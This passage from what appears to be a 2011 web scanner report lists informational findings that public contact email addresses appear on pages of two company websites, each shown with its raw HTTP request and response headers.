Confidence:   Certain
Host:   http://www.revsolutionsinc.com
Path:   /careers.html

Issue detail

The following email address was disclosed in the response:

Request

GET /careers.html HTTP/1.1
Host: www.revsolutionsinc.com
Proxy-Connection: keep-alive
Referer: http://www.revsolutionsinc.com/solutions.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:35:59 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "1ec8-4d81e194-0"
Last-Modified: Thu, 17 Mar 2011 10:25:24 GMT
Content-Type: text/html
Content-Length: 7880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>REV Solutions Inc.</
...[SNIP]...
<a href="mailto:hr@revsolutionsinc.com" class="flat-red-text">hr@revsolutionsinc.com</a>
...[SNIP]...

22.92. http://www.revsolutionsinc.com/careers_req_7.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revsolutionsinc.com
Path:   /careers_req_7.html

Issue detail

The following email address was disclosed in the response:

Request

GET /careers_req_7.html HTTP/1.1
Host: www.revsolutionsinc.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:32:46 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "2325-4d81e18c-0"
Last-Modified: Thu, 17 Mar 2011 10:25:16 GMT
Content-Type: text/html
Content-Length: 8997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>REV Solutions Inc.</
...[SNIP]...
<a href="mailto:hr@revsolutionsinc.com" class="flat-red-text">hr@revsolutionsinc.com</a>
...[SNIP]...

22.93. http://www.revsolutionsinc.com/contact_us.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.revsolutionsinc.com
Path:   /contact_us.html

Issue detail

The following email address was disclosed in the response:

Request

GET /contact_us.html HTTP/1.1
Host: www.revsolutionsinc.com
Proxy-Connection: keep-alive
Referer: http://www.revsolutionsinc.com/careers.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:36:00 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "1c0f-4dc4bf58-0"
Last-Modified: Sat, 07 May 2011 03:41:12 GMT
Content-Type: text/html
Content-Length: 7183

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>REV Solutions Inc.</
...[SNIP]...
<a href="mailto:info@revsolutionsinc.com" class="flat-red-text">info@revsolutionsinc.com</a>
...[SNIP]...

22.94. http://www.sophelle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; __utma=227204639.668059565.1315148193.1315148193.1315148193.1; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-04%2010%3A56%3A09

Response

HTTP/1.1 200 OK
Content-Length: 13673
Content-Type: text/html
Content-Location: http://www.sophelle.com/index.html
Last-Modified: Wed, 31 Aug 2011 16:06:08 GMT
Accept-Ranges: bytes
ETag: "1a1549e5f767cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:25:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.95. http://www.sophelle.com/Contact-Us/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /Contact-Us/

Issue detail

The following email address was disclosed in the response:

Request

GET /Contact-Us/ HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.1.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A27%3A50; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6

Response

HTTP/1.1 200 OK
Content-Length: 10039
Content-Type: text/html
Content-Location: http://www.sophelle.com/Contact-Us/index.html
Last-Modified: Tue, 26 Apr 2011 13:15:36 GMT
Accept-Ranges: bytes
ETag: "a042c37144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:26:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com">info@sophelle.com</a>
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.96. http://www.sophelle.com/Contact-Us/thank-you.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /Contact-Us/thank-you.html

Issue detail

The following email address was disclosed in the response:

Request

GET /Contact-Us/thank-you.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Contact-Us/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.2.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A27%3A57

Response

HTTP/1.1 200 OK
Content-Length: 5435
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:15:37 GMT
Accept-Ranges: bytes
ETag: "5214388144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:26:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.97. http://www.sophelle.com/Products/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /Products/

Issue detail

The following email address was disclosed in the response:

Request

GET /Products/ HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Contact-Us/thank-you.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.3.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A28%3A01

Response

HTTP/1.1 200 OK
Content-Length: 8484
Content-Type: text/html
Content-Location: http://www.sophelle.com/Products/index.html
Last-Modified: Tue, 26 Apr 2011 13:19:31 GMT
Accept-Ranges: bytes
ETag: "e6173a94144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:26:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.98. http://www.sophelle.com/Products/CQ/free-trial.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /Products/CQ/free-trial.html

Issue detail

The following email address was disclosed in the response:

Request

GET /Products/CQ/free-trial.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Products/CQ/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotdt=2011-09-06%2011%3A28%3A05; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.5.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 11346
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:17:45 GMT
Accept-Ranges: bytes
ETag: "88c5d554144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:26:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Free Trial Offer |
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.99. http://www.sophelle.com/Products/CQ/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /Products/CQ/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /Products/CQ/index.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Products/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.4.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A28%3A05

Response

HTTP/1.1 200 OK
Content-Length: 9677
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:19:18 GMT
Accept-Ranges: bytes
ETag: "7a3f6c8c144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:26:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Website Testing, Mo
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.100. http://www.sophelle.com/Products/accelerator2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /Products/accelerator2.html

Issue detail

The following email address was disclosed in the response:

Request

GET /Products/accelerator2.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Products/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.21.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A31%3A37

Response

HTTP/1.1 200 OK
Content-Length: 7632
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:17:34 GMT
Accept-Ranges: bytes
ETag: "28896d4e144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:38:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.101. http://www.sophelle.com/Success-Stories/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /Success-Stories/

Issue detail

The following email address was disclosed in the response:

Request

GET /Success-Stories/ HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.19.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A28%3A17

Response

HTTP/1.1 200 OK
Content-Length: 9245
Content-Type: text/html
Content-Location: http://www.sophelle.com/Success-Stories/index.html
Last-Modified: Tue, 26 Apr 2011 13:17:57 GMT
Accept-Ranges: bytes
ETag: "ef5165c144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:29:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.102. http://www.sophelle.com/Success-Stories/Automated-Website-Testing.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /Success-Stories/Automated-Website-Testing.html

Issue detail

The following email address was disclosed in the response:

Request

GET /Success-Stories/Automated-Website-Testing.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Success-Stories/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.20.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A31%3A22

Response

HTTP/1.1 200 OK
Content-Length: 9759
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:17:55 GMT
Accept-Ranges: bytes
ETag: "0bf755a144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:29:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link rel="shortcut icon"
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.103. http://www.sophelle.com/products/cq/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /products/cq/

Issue detail

The following email address was disclosed in the response:

Request

GET /products/cq/ HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/products/cq/frequently-asked-questions.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.17.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A28%3A17

Response

HTTP/1.1 200 OK
Content-Length: 9677
Content-Type: text/html
Content-Location: http://www.sophelle.com/products/cq/index.html
Last-Modified: Tue, 26 Apr 2011 13:19:18 GMT
Accept-Ranges: bytes
ETag: "7a3f6c8c144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:29:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Website Testing, Mo
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.104. http://www.sophelle.com/products/cq/expert-analysis.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /products/cq/expert-analysis.html

Issue detail

The following email address was disclosed in the response:

Request

GET /products/cq/expert-analysis.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/products/cq/user-interface-testing.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotdt=2011-09-06%2011%3A28%3A17; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.13.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 9551
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:17:44 GMT
Accept-Ranges: bytes
ETag: "3c85554144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:28:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Expert Analysis | C
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.105. http://www.sophelle.com/products/cq/frequently-asked-questions.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /products/cq/frequently-asked-questions.html

Issue detail

The following email address was disclosed in the response:

Request

GET /products/cq/frequently-asked-questions.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/products/cq/free-trial.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.16.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A28%3A17

Response

HTTP/1.1 200 OK
Content-Length: 18938
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:17:46 GMT
Accept-Ranges: bytes
ETag: "64956955144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:29:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Frequently Asked Qu
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.106. http://www.sophelle.com/products/cq/functional-testing.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sophelle.com
Path:   /products/cq/functional-testing.html

Issue detail

The following email address was disclosed in the response:

Request

GET /products/cq/functional-testing.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/products/cq/expert-analysis.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
